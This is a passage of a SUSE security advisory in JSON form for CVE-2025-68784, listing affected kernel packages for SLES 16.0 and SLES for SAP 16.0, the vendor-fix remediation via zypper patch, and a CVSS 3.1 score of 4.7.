"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68784",
"url": "https://www.suse.com/security/cve/CVE-2025-68784"
},
{
"category": "external",
"summary": "SUSE Bug 1256793 for CVE-2025-68784",
"url": "https://bugzilla.suse.com/1256793"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
